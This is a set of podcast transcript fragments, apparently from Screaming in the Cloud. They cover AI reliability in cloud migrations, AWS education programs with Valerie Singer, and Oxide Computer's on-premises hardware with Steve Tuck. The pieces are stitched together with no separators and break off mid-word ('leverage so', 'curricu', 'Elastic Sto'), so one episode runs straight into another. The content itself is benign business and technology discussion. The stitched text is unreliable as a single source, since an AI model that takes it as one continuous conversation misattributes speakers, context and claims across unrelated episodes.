Because if I can’t trust the things you tell me, and trust you to call it out when you aren’t sure of something, then I’ve got to second-guess everything you tell me. And it feels like when it comes to architecture and migrations in particular, the devil really is in the details. It doesn’t take much to design a greenfield architecture on a whiteboard, whereas being able to migrate something from one place to another and not have it go down in the process? That’s a lot of work.

David: Absolutely.
I have used AI successfully to do a lot of research very quickly across broad market terms and things like that, but I do also agree with you that we have to be careful using it as a carte blanche force multiplier for teams, especially in migration scenarios. Like, if you were to throw Chat-Gippity—as you say—a bunch of COBOL code and say, “Hey, translate this,” it can do a pretty good job, but the devil is in that detail, and you need to have an experienced person actually vet that code to make sure it’s suitable. Otherwise, you’ll find yourself creating buggy things downstream. I’ve run into this myself. You know, “Produce some Terraform for me.” When I generated some Terraform for an architecture I was working on, I thought, “This is pretty good.” But then I realized it was actually two years out of date, and that’s about how old my skills were as well. So, I needed to engage someone else on my team to help me get that job done.

Corey: So, migrations have been one of those things that people have been talking about for, well, as long as we’ve had more than one data center on the planet. “How do we get our stuff from over here to over there?” And so on and so forth. But the context and tenor of those conversations has changed dramatically. What have you seen this past year or so as far as emerging trends? What is the industry doing that might not be obvious from the outside?

David: Well, cost optimization has been number one on people’s minds, and migrating with financial responsibility in mind has been refreshing. So, working backwards from the customer’s outcomes is still number one in our book, and increasingly we see customers say, “Hey, I want to migrate to cloud to close a data center or avoid some capital outlay.” That’s the first thing we hear, but then we work backwards from their three-year plan.
And then what we’ve seen so far is that customers have shifted from a very IT-centric view of cloud and what they’re trying to deliver to a much more business-centric one. Now, they’ll say things like, “I want to be able to bring new capabilities to market more quickly. I want to be able to operate and leverage so
Valerie Singer, GM of Global Education at AWS, joins Corey on Screaming in the Cloud to discuss the vast array of cloud computing education programs AWS offers to people of all skill levels and backgrounds. Valerie explains how she manages such a large undertaking, and also sheds light on what AWS is doing to ensure their programs are truly valuable both to learners and to the broader market. Corey and Valerie discuss how generative AI is applicable to education, and Valerie explains how AWS’s education programs fit into a K-12 curriculum as well as serve job seekers looking to upskill.

About Valerie
As General Manager for AWS’s Global Education team, Valerie is responsible for leading strategy and initiatives for higher education, K-12, EdTechs, and outcome-based education worldwide. Her Skills to Jobs team enables governments, education systems, and collaborating organizations to deliver skills-based pathways to meet the acute needs of employers around the globe, match skilled job seekers to good-paying jobs, and advance the adoption of cloud-based technology.

In her ten-year tenure at AWS, Valerie has held numerous leadership positions, including driving strategic customer engagement within AWS’s Worldwide Public Sector and Industries. Valerie established and led AWS’s public sector global partner team and AWS’s North American commercial partner team, was the leader for teams managing AWS’s largest worldwide partnerships, and incubated AWS’s Aerospace & Satellite Business Group.
Valerie established AWS’s national systems integrator program and promoted partner competency development and practice expansion to migrate enterprise-class, large-scale workloads to AWS.

Valerie currently serves on the board of AFCEA DC where, as the Vice President of Education, she oversees a yearly grant of $250,000 in annual STEM scholarships to high school students with acute financial need.

Prior to joining AWS, Valerie held senior positions at Quest Software, Adobe Systems, Oracle Corporation, BEA Systems, and Cisco Systems. She holds a B.S. in Microbiology from the University of Maryland and a Master of Public Administration from the George Washington University.

Links Referenced:
AWS:
GetIT:
Spark:
Future Engineers:
Academy:
Educate:
Skill Builder:
Labs:
re/Start:
AWS training and certification programs:

Transcript
Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.

Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. A recurring theme of this show in the, what is it, 500-some-odd episodes since we started doing this many years ago has been where the next generation comes from. And ‘next generation’ doesn’t always mean young folks graduating school or whatnot. It’s people transitioning in, it’s career changers, it’s folks whose existing jobs evolve into embracing the cloud industry a lot more readily than they have in previous years. My guest today arguably knows that better than most. Valerie Singer is the GM of Global Education at AWS. Valerie, thank you for agreeing to suffer my slings and arrows. I appreciate it.

Valerie: And thank you for having me, Corey. I’m looking forward to the conversation.

Corey: So, let’s begin.
GM, General Manager, is generally a term of art which means you are, to my understanding, the buck-stops-here person for a particular division within AWS. And Global Education sounds like one of those, quite frankly, impossibly large-scoped types of organizations. What do you folks do? Where do you start? Where do you stop?

Valerie: So, my organization actually focuses on five key areas, and it really does take a look at the global strategy for Amazon Web Services in higher education, research, our K through 12 community, our community of ed-tech providers, which are software providers that are specifically focused on the education sector, and the last plinth of the Global Education team is around skills to jobs. And we care about that a lot because as we’re talking to education providers about how they can innovate in the cloud, we also want to make sure that they’re thinking about the outcomes of their students, and as their students become more digitally skilled, that there is placement for them and opportunities for them with employers so that they can continue to grow in their careers.

Corey: Early on, when I was starting out my career, I had an absolutely massive chip on my shoulder when it came to formal education. I was never a great student, for many of the same reasons I was never a great employee. And I always found that learning for me took the form of doing something and kicking the tires on it, and I had to care. Doing rote assignments in a ritualized way never really worked out. So, I never fit in in academia. On paper, I still have an eighth-grade education. One of these days, I might get the GED.

But I really had problems with degree requirements in jobs. And it’s humorous, because my first tech job that was a breakthrough was as a network administrator at Chapman University.
And that honestly didn’t necessarily help improve my opinion of academia for a while, when you’re basically the final escalation tier for the support desk for a bunch of PhDs who are troubled by some of the things that they’re working on, because they’re very smart in one particular area but have challenges with broad tech. So, all of which is to say that I’ve had problems with the way that education historically maps to me personally, and it took a little bit of growth for me to realize that I might not be the common, typical case that represents everyone. So, I’ve really come around on that. What is the current state of how AWS views educating folks? You talk about working with higher ed; you also talk about K through 12. Where does this, I guess, pipeline start for you folks?

Valerie: So, Amazon Web Services offers a host of education programs at the K-12 level, where we can start to capture learners and capture their imagination for digital skills and cloud-based learning early on. Programs like GetIT and Spark make sure that our learners have a trajectory forward and continue to stay engaged.

Amazon Future Engineer also provides experiential learning and data center-based experiences for K through 12 learners, too, so that we can start to gravitate these learners towards skills that they can use later in life and that they’ll be able to leverage. That said—and going back to what you said—we want to capture learners where they learn and how they learn. And so, that often happens not in a K through 12 environment and not in a higher education environment.
It can happen organically, it can happen through online learning, it can happen through mentoring, and through other types of sponsorship. And so, we want to make sure that our learners have the opportunities to micro-badge, to credential, and to experience learning in the cloud particularly, and also to develop digital skills wherever and however they learn, not just in a prescriptive environment like higher education.

Corey: During the Great Recession, I found that as a systems administrator—which is what we called ourselves in the style of the time—I was relatively weak when it came to networking. So, I took a class at the local community college where they built the entire curriculum around getting some Cisco certifications by the time the year ended. And half of that class was awesome. It was effectively networking fundamentals in an approachable, constructive way, and that was great. The other half of the class—at least at the time—felt like it was extraordinarily beholden to, effectively—there’s no nice way to say this—Cisco marketing.

It envisioned a world where all networking equipment was Cisco-driven, using proprietary Cisco protocols, and it left a bad smell for a number of students in the class. Now, I’ve talked to an awful lot of folks who have gone through the various AWS educational programs in a variety of different ways, and I’ve yet to hear a significant volume of complaint along the lines of, “Oh, it’s all vendor-captured and it just feels like we’re being indoctrinated into the cult of AWS.” Which, honestly, is to your credit. How did you avoid that?

Valerie: It’s a great question, and how we avoid it is by starting with the skills that are needed for jobs.
And so, we actually went back to employers and said, “What are your, you know, biggest and most urgent needs to fill in early-career talent?” And we categorized 12 different job categories; the four that were most predominant were cloud support engineer, software development engineer, cyber analyst, and data analyst. And we took that mapping and developed the skills behind those four different job categories that we know are saleable and that our learners can get employed in, and then made modifications as our employers took a look at what the skills maps needed to be. We then took the skills maps—in one case—into City University of New York, into their computer science department, and mapped those skills back to the curriculum that the computer science teams have been providing to students.

And so, what you have is, your half-awesome becomes full-awesome, because we’re providing them the materials through AWS Academy to be able to proffer the right set of curricu
Steve Tuck, Co-Founder & CEO of Oxide Computer Company, joins Corey on Screaming in the Cloud to discuss his work to make modern computers cloud-friendly. Steve describes what it was like going through early investment rounds, and the difficult but important decision he and his co-founder made to build their own switch. Corey and Steve discuss the demand for on-prem computers that are built for cloud capability, and Steve reveals how Oxide approaches their product builds to ensure the masses can adopt their technology wherever they are.

About Steve
Steve is the Co-founder & CEO of Oxide Computer Company. He previously was President & COO of Joyent, a cloud computing company acquired by Samsung. Before that, he spent 10 years at Dell in a number of different roles.

Links Referenced:
Oxide Computer Company:
On The Metal Podcast:

Transcript
Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.

Corey: This episode is brought to us in part by our friends at Red Hat. As your organization grows, so does the complexity of your IT resources. You need a flexible solution that lets you deploy, manage, and scale workloads throughout your entire ecosystem. The Red Hat Ansible Automation Platform simplifies the management of applications and services across your hybrid infrastructure with one platform. Look for it on the AWS Marketplace.

Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. You know, I often say it—but not usually on the show—that Screaming in the Cloud is a podcast about the business of cloud, which is intentionally overbroad so that I can talk about basically whatever the hell I want to with whoever the hell I’d like.
Today’s guest is, in some ways of thinking, about as far in the opposite direction from cloud as it’s possible to go and still be involved in the digital world. Steve Tuck is the CEO at Oxide Computer Company. You know, computers: the things we all pretend aren’t underpinning those clouds out there that we all use and pay for by the hour, gigabyte, second, month, pound, or whatever it works out to. Steve, thank you for agreeing to come back on the show after a couple years, and once again suffer my slings and arrows.

Steve: Much appreciated. Great to be here. It has been a while. I was looking back, I think three years. This was, like, pre-pandemic, pre-interest rates, pre… Twitter going totally sideways.

Corey: And I have to ask to start with that: it feels, on some level, like toward the start of the pandemic, when everything was flying high and we’d had low interest rates for a decade, that there was a lot of… well, lunacy lurking around in the industry; my own business saw it, too. It turns out that not giving a shit about the AWS bill is, in fact, a zero-interest-rate phenomenon. And with all that money or concentrated capital sloshing around, people decided to do ridiculous things with it. I would have thought, on some level, that “We’re going to start a computer company in the Bay Area making computers” would have been one of those, but given that we are a year into the correction and things seem to be heading up and to the right for you folks, that take was wrong. How’d I get it wrong?

Steve: Well, I mean, first of all, you got part of it right, which is there were just a litany of ridiculous companies and projects and money being thrown in all directions at that time.

Corey: An NFT of a computer. We’re going to have one of those. That’s what you’re selling, right? Then you had to actually hard-pivot to making the real thing.

Steve: That’s it. So, we might as well cut right to it, you know. This is—we went through the crypto phase.
But you know, when we started the company, it was, yes, a computer company. It’s on the tin. It’s definitely kind of the foundation of what we’re building. But you know, we think about what a modern computer looks like through the lens of cloud.

I was at a cloud computing company for ten years prior to us founding Oxide, as was Bryan Cantrill, CTO and co-founder. And, you know, we are huge, huge fans of cloud computing, which was an interesting kind of dichotomy in conversations when we were raising for Oxide—because, of course, Sand Hill is terrified of hardware. And when we think about what modern computers need to look like, they need to be in support of the characteristics of cloud, and cloud computing being not that you’re renting someone else’s computers, but that you have fully programmable infrastructure that allows you to slice and dice, you know, compute and storage and networking however software needs. And so, what we set out to go build was a way for the companies that are running on-premises infrastructure—which, by the way, is almost everyone and will continue to be so for a very long time—to get access to the benefits of cloud computing. And to do that, you need to build a different kind of computing infrastructure and architecture, and you need to plumb the whole thing with software.

Corey: There are a number of different ways to view cloud computing. And I think that a lot of the, shall we say, incumbent vendors over in the computer manufacturing world tend to sound kind of like dinosaurs, on some level, where they’re always talking in terms of, you’re a giant company and you already have a whole bunch of data centers out there. But one of the magical pieces of cloud is you can have a ridiculous idea at nine o’clock tonight and by morning, you’ll have a prototype, if you’re of that bent. And if it turns out it doesn’t work, you’re out, you know, 27 cents.
And if it does work, you can keep going and not have to stop and rebuild on something enterprise-grade.

So, for the small-scale stuff and rapid iteration, cloud providers are terrific. Conversely, when you wind up with giant fleets of millions of computers, in some cases, there begin to be economic factors that weigh in, and for some workloads—yes, I know it’s true—going to a data center is the economical choice. But my question is, in starting a new company in the direction of building these things, is it purely about economics, or is there a capability story tied in there somewhere, too?

Steve: Yeah, economics actually ends up being a distant third or fourth in the list of needs and priorities from the companies that we’re working with. When we talk about—and just to be clear, our demographic, the part of the market that we are focused on, is large enterprises, like, folks that are spending, you know, half a billion, a billion dollars a year on IT infrastructure. They, over the last five years, have moved a lot of the use cases that are great for public cloud out to the public cloud, and they still have this very, very large need, be it for latency reasons or cost reasons, security reasons, regulatory reasons, where they need on-premises infrastructure in their own data centers and colo facilities, et cetera. And it is for those workloads, in that part of their infrastructure, that they are forced to live with enterprise technologies that are 10, 20, 30 years old, you know, that haven’t evolved much since I left Dell in 2009. And, you know, when you think about, like, what are the capabilities that are so compelling about cloud computing, one of them is, yes, what you mentioned, which is you have an idea at nine o’clock at night and swipe a credit card, and you’re off and running. And that is not the case for an idea that someone has who is going to use the on-premises infrastructure of their company.
And this is where you get shadow IT and 16 digits to freedom and all the like.

Corey: Yeah, everyone with a corporate credit card winds up being a shadow IT source in many cases. If your processes as a company don’t make it easier to proceed the right way rather than the wrong way, people are going to be fighting against you every step of the way. Sometimes the only stick you’ve got is that of regulation, which in some industries, great, but in other cases, no, you get to play Whack-a-Mole. I’ve talked to too many companies that have specific scanners built into their mail systems, looking every month for things that look like AWS invoices.

Steve: [laugh]. Right, exactly. And so, you know, but if you flip it around, and you say, well, what if the experience for all of the infrastructure that I am running, or that I want to provide to my software development teams, be it rented through AWS, GCP, or Azure, or owned for economic reasons or latency reasons, had a similar set of characteristics, where my development team could hit an API endpoint and provision instances in a matter of seconds when they had an idea, and only pay for what they use? Back to kind of corporate IT. And what if they were able to use the same kind of developer tools they’ve become accustomed to using, be it Terraform scripts and the kinds of access that they are accustomed to? How do you make those developers just as productive across the business, instead of just through public cloud infrastructure?

At that point, then you are in a much stronger position where you can say, you know, for a portion of things that are, as you pointed out, you know, more unpredictable, and where I want to leverage a bunch of additional services that a particular cloud provider has, I can rent that. And where I’ve got more persistent workloads, or where I want a different economic profile, or I need to have something in a very low-latency manner to another set of services, I can own it.
And that’s where I think the real chasm is because today, you just don’t—we take for granted the basic plumbing of cloud computing, you know? Elastic Compute, Elastic Sto